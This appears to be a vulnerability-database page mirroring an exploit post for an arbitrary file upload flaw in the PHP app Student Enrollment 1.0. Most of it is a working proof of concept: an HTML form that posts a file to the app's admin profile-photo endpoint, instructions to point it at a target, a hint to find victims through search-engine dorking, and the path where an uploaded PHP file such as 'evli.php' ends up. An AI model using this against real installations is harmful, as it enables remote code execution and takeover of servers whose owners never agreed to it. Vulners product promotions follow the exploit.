Lucene search
K

Student Enrollment 1.0 Arbitrary File Upload

🗓️ 30 Sep 2024 00:00:00Reported by indoushkaType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 213 Views

Student Enrollment 1.0 Arbitrary File Upload vulnerability on Windows 10 Firefox 125.0.

Code
`=============================================================================================================================================  
| # Title : Student Enrollment v1.0 Remote File Upload Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |  
| # Vendor : https://download-media.code-projects.org/2020/06/Student_Enrollment_In_PHP_With_Source_Code.zip |  
=============================================================================================================================================  
  
poc :  
  
[+] Dorking İn Google Or Other Search Enggine.  
  
[+] The following html code uploads a executable malicious file remotely .  
  
[+] use payload :   
  
<!DOCTYPE html>  
<html lang="en">  
<head>  
<meta charset="UTF-8">  
<meta name="viewport" content="width=device-width, initial-scale=1.0">  
<title>Upload Profile Photo</title>  
</head>  
<body>  
<h2>Upload Profile Photo</h2>  
<form action="http://127.0.0.1/student-php-enroolment/admin/index.php?page=user-profile" method="POST" enctype="multipart/form-data">  
<label for="userphoto">Select Photo:</label>  
<input type="file" id="userphoto" name="userphoto" required><br><br>  
  
<button type="submit" name="upphoto">Upload Photo</button>  
</form>  
</body>  
</html>  
  
  
[+] Go to the line 10. Set the target site link Save changes and apply .   
  
[+] save code as poc.html   
  
[+] Link to the uploaded files : admin/index.php?page=user-profile  
  
[+] path : http://127.0.0.1/student-php-enroolment/admin/images/ evli.php  
  
Greetings to :=====================================================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|  
===================================================================================================  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation